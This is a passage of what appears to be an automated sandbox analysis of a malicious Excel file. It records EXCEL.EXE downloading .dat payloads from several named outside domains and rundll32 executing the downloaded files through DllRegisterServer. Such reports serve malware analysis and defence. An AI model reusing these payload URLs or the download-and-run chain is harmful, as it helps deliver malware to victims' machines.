                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 37 72 75 7a 65 7a 65 6e 64 65 67 69 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://7ruzezendegi.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                Feb 22, 2021 22:50:49.077519894 CET2OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 7ruzezendegi.com
                                Connection: Keep-Alive
                                Feb 22, 2021 22:50:49.231807947 CET3INHTTP/1.1 200 OK
                                Date: Mon, 22 Feb 2021 21:50:48 GMT
                                Server: Apache
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Transfer-Encoding: chunked
                                Content-Type: text/html
                                Feb 22, 2021 22:50:49.231882095 CET3INData Raw: 32 61 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 6e 64 20 21 3c 2f 74 69
                                Data Ascii: 2a6<!doctype html><html><head><meta charset="utf-8"><title>Suspend !</title><link href="http://suspend.pars.host/css/css.css" rel="stylesheet" type="text/css"></head><body><div class="main"><center><a style="" href="http:
                                Feb 22, 2021 22:50:49.232572079 CET3INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.22491702.59.117.21580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                TimestampkBytes transferredDirectionData
                                Feb 22, 2021 22:51:10.865932941 CET5OUTGET /qtuofsxtov/44249951829861100000.dat HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: batikentklinik.com
                                Connection: Keep-Alive
                                Feb 22, 2021 22:51:12.157866001 CET6INHTTP/1.1 404 Not Found
                                Content-Type: text/html; charset=UTF-8
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://batikentklinik.com/wp-json/>; rel="https://api.w.org/"
                                X-Litespeed-Cache-Control: public,max-age=3600
                                X-Litespeed-Tag: 164_HTTP.404,164_404,164_URL.13aed0d0174f3be9038c17f54db51e93,164_
                                Transfer-Encoding: chunked
                                Date: Mon, 22 Feb 2021 21:49:24 GMT
                                Server: LiteSpeed
                                Connection: Keep-Alive
                                Data Raw: 35 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 4b 65 6e 74 20 4b 6c 69 6e 69 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4b 65 6e 74 20 4b 6c 69 6e 69 6b 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 61 74 69 6b 65 6e 74 6b 6c 69 6e 69 6b 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4b 65 6e 74 20 4b 6c 69 6e 69 6b 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 61 74 69 6b 65 6e 74 6b 6c 69 6e 69 6b 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 35 66 35 66 35 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 4b 65 6e 74 20 4b 6c 69 6e 69 6b 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 62 61 74 69 6b 65 6e 74 6b 6c 69 6e 69 6b 2e 63 6f 6d 2f 71 74 75 6f 66 73 78 74 6f 76 2f 34 34 32 34 39 39 35 31 38 32 39 38 36 31 31 30 30 30 30 30 2e 64 61 74 22 3e 0a 3c 6d 65 74 61 20 70
                                Data Ascii: 511<!DOCTYPE HTML><html lang="tr"><head><meta charset="UTF-8"><title>Sayfa bulunamad &#8211; Kent Klinik</title><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Kent Klinik &raquo; beslemesi" href="https://batikentklinik.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Kent Klinik &raquo; yorum beslemesi" href="https://batikentklinik.com/comments/feed/" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE"><meta name="theme-color" content="#f5f5f5"><meta property="og:title" content="Sayfa bulunamad &#8211; Kent Klinik"><meta property="og:url" content="http://batikentklinik.com/qtuofsxtov/44249951829861100000.dat"><meta p
                                Feb 22, 2021 22:51:12.157892942 CET7INData Raw: 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 5f 54 52 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 6e 74 20 4b
                                Data Ascii: roperty="og:locale" content="tr_TR"><meta property="og:site_name" content="Kent Klinik"><meta property="og:type" content="website"><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/e
                                Feb 22, 2021 22:51:12.157907963 CET8INData Raw: 31 61 65 66 0d 0a 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 36 2e 32 22 7d 7d 3b 0a 09 09 09 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c
                                Data Ascii: 1aefmoji-release.min.js?ver=5.6.2"}};!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=
                                Feb 22, 2021 22:51:12.157979965 CET9INData Raw: 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 74 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b
                                Data Ascii: ag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventList
                                Feb 22, 2021 22:51:12.158237934 CET11INData Raw: 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 25 33 41 36 30 30 25 37 43 4f 70 65 6e 2b 53 61 6e 73 25 33 41 34 30 30 25 32 43 37
                                Data Ascii: href='https://fonts.googleapis.com/css?family=Poppins%3A600%7COpen+Sans%3A400%2C700&#038;display=swap&#038;ver=5.6.2' type='text/css' media='all' /><link rel='stylesheet' id='us-style-css' href='http://batikentklinik.com/wp-content/themes/I
                                Feb 22, 2021 22:51:12.158437967 CET12INData Raw: 6e 74 65 6e 74 3d 22 50 6f 77 65 72 65 64 20 62 79 20 57 50 42 61 6b 65 72 79 20 50 61 67 65 20 42 75 69 6c 64 65 72 20 2d 20 64 72 61 67 20 61 6e 64 20 64 72 6f 70 20 70 61 67 65 20 62 75 69 6c 64 65 72 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73
                                Data Ascii: ntent="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/><meta name="generator" content="Powered by Slider Revolution 6.3.9 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop
                                Feb 22, 2021 22:51:12.158679008 CET14INData Raw: 20 65 2e 74 68 75 6d 62 68 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 20 3f 20 30 20 3a 20 70 61 72 73 65 49 6e 74 28 65 2e 74 68 75 6d 62 68 29 3b 0d 0a 09 09 09 09 09 65 2e 74 61 62 68 69 64 65 20 3d 20 65 2e 74 61 62 68 69 64 65 3d 3d 3d 75 6e 64 65
                                Data Ascii: e.thumbh===undefined ? 0 : parseInt(e.thumbh);e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide);e.mh = e.mh===undefined || e.mh=="" || e.mh==="au
                                Feb 22, 2021 22:51:12.158902884 CET14INData Raw: 29 3b 09 09 09 09 09 0d 0a 09 09 09 09 09 09 6e 65 77 68 20 3d 20 20 28 65 2e 67 68 5b 69 78 5d 20 2a 20 6d 29 20 2b 20 28 65 2e 74 61 62 68 20 2b 20 65 2e 74 68 75 6d 62 68 29 3b 0d 0a 09 09 09 09 09 7d 09 09 09 09 0d 0a 09 09 09 09 09 69 66 28
                                Data Ascii: );newh = (e.gh[ix] * m) + (e.tabh + e.thumbh);}if(window.rs_init_css===undefined) window.rs_init_css = document.head.appendChild(document.createElement("style"));docum
                                Feb 22, 2021 22:51:12.158957005 CET16INData Raw: 32 30 30 30 0d 0a 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 63 29 2e 68 65 69 67 68 74 20 3d 20 6e 65 77 68 2b 22 70 78 22 3b 0d 0a 09 09 09 09 09 77 69 6e 64 6f 77 2e 72 73 5f 69 6e 69 74 5f 63 73 73 2e 69 6e 6e 65 72 48 54
                                Data Ascii: 2000ent.getElementById(e.c).height = newh+"px";window.rs_init_css.innerHTML += "#"+e.c+"_wrapper { height: "+newh+"px }";} catch(e){console.log("Failure at Presize of Slider:" + e)} //}); };</sc
                                Feb 22, 2021 22:51:12.159157038 CET17INData Raw: 61 2f 66 6f 6e 74 73 2f 66 61 2d 6c 69 67 68 74 2d 33 30 30 2e 77 6f 66 66 3f 76 65 72 3d 37 2e 31 33 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 7d 2e 66 61 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 66 6f 6e 74 61 77 65 73 6f 6d 65 22
                                Data Ascii: a/fonts/fa-light-300.woff?ver=7.13") format("woff")}.fal{font-family:"fontawesome";font-weight:300}@font-face{font-display:block;font-style:normal;font-family:"Font Awesome 5 Duotone";font-weight:900;src:url("http://batikentklinik.com/wp-conte
                                Feb 22, 2021 22:51:12.236942053 CET18INData Raw: 3d 22 75 73 2d 74 68 65 6d 65 2d 6f 70 74 69 6f 6e 73 2d 63 73 73 22 3e 2e 73 74 79 6c 65 5f 70 68 6f 6e 65 36 2d 31 3e 2a 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 62 61 74 69 6b 65 6e 74 6b 6c 69
                                Data Ascii: ="us-theme-options-css">.style_phone6-1>*{background-image:url(https://batikentklinik.com/wp-content/themes/Impreza/img/phone-6-black-real.png)}.style_phone6-2>*{background-image:url(https://batikentklinik.com/wp-content/themes/Impreza/img/pho


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.2249171192.185.16.9580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                TimestampkBytes transferredDirectionData
                                Feb 22, 2021 22:51:12.516158104 CET34OUTGET /ictrljsfuh/44249951829861100000.dat HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: chandni.pk
                                Connection: Keep-Alive
                                Feb 22, 2021 22:51:12.701843023 CET34INHTTP/1.1 302 Found
                                Date: Mon, 22 Feb 2021 21:51:12 GMT
                                Server: nginx/1.19.5
                                Content-Type: text/html; charset=iso-8859-1
                                Content-Length: 227
                                Location: http://chandni.pk/cgi-sys/suspendedpage.cgi
                                X-Server-Cache: true
                                X-Proxy-Cache: MISS
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 68 61 6e 64 6e 69 2e 70 6b 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://chandni.pk/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                Feb 22, 2021 22:51:12.703169107 CET35OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: chandni.pk
                                Connection: Keep-Alive
                                Feb 22, 2021 22:51:13.063440084 CET35INHTTP/1.1 200 OK
                                Date: Mon, 22 Feb 2021 21:51:12 GMT
                                Server: nginx/1.19.5
                                Content-Type: text/html
                                Content-Length: 315
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                X-Server-Cache: false
                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 65 91 d1 4f c2 30 10 c6 df fd 2b 6a 13 7d 1b 1d 8a 89 d1 76 26 0e 54 92 c9 88 cc 18 9f 4c 59 6f ac c9 b6 ce ee 26 f2 df cb 56 10 0d f7 f6 fb 72 f7 f5 eb 1d 3f 1d c7 61 f2 3e 9f 90 1c cb 82 cc 5f ef a3 69 48 a8 c7 d8 db 65 c8 d8 38 19 93 a7 e4 39 22 a3 81 3f 24 89 95 55 a3 51 9b 4a 16 8c 4d 66 34 38 e1 dd 58 70 42 5c f1 1c a4 fa a5 7d 71 d4 58 40 10 9a 0a 65 8a 64 d1 d6 b5 b1 c8 99 93 8f ba 4b 40 b9 4d 83 b5 07 9f ad fe 12 b4 1b 84 0a bd 64 53 03 25 a9 23 41 11 be 91 75 cf df 92 34 97 b6 01 14 2d 66 de 35 3d c4 61 ff f2 f0 a5 51 1b 52 4a bb d2 d5 5a 2b cc 05 f5 e9 8e 73 d0 ab 1c 7b a1 80 0c 9d d8 23 9a fa 40 c7 69 75 66 65 09 64 e7 37 f4 fd 33 4a f6 66 8e fa 86 a5 b1 0a 6c 6f b8 08 5f e2 28 9a ce 1e 05 95 2d 1a 7a 94 a8 b1 a9 a0 dd 02 6e 18 cb d6 aa 69 ea 41 6a 4a 76 a7 2a 61 21 03 0b f6 43 01 42 8a e7 b5 56 e2 6a 1e 47 a3 87 8b 78 44 03 ce 5c 9a 3f 0b e8 be bc bd 12 73 67 fa 01 31 ba ab ae ee 01 00 00
                                Data Ascii: eO0+j}v&TLYo&Vr?a>_iHe89"?$UQJMf48XpB\}qX@edK@MdS%#Au4-f5=aQRJZ+s{#@iufed73Jflo_(-zniAjJv*a!CBVjGxD\?sg1


                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:22:50:35
                                Start date:22/02/2021
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                Imagebase:0x13ff80000
                                File size:27641504 bytes
                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:22:51:04
                                Start date:22/02/2021
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32 ..\JDFR.hdfgr,DllRegisterServer
                                Imagebase:0xff820000
                                File size:45568 bytes
                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:22:51:04
                                Start date:22/02/2021
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32 ..\JDFR.hdfgr1,DllRegisterServer
                                Imagebase:0xff820000
                                File size:45568 bytes
                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:22:51:05
                                Start date:22/02/2021
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32 ..\JDFR.hdfgr2,DllRegisterServer
                                Imagebase:0xff820000
                                File size:45568 bytes
                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:22:51:05
                                Start date:22/02/2021
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32 ..\JDFR.hdfgr3,DllRegisterServer
                                Imagebase:0xff820000
                                File size:45568 bytes
                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:22:51:05
                                Start date:22/02/2021
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32 ..\JDFR.hdfgr4,DllRegisterServer
                                Imagebase:0xff820000
                                File size:45568 bytes
                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis

                                Reset < >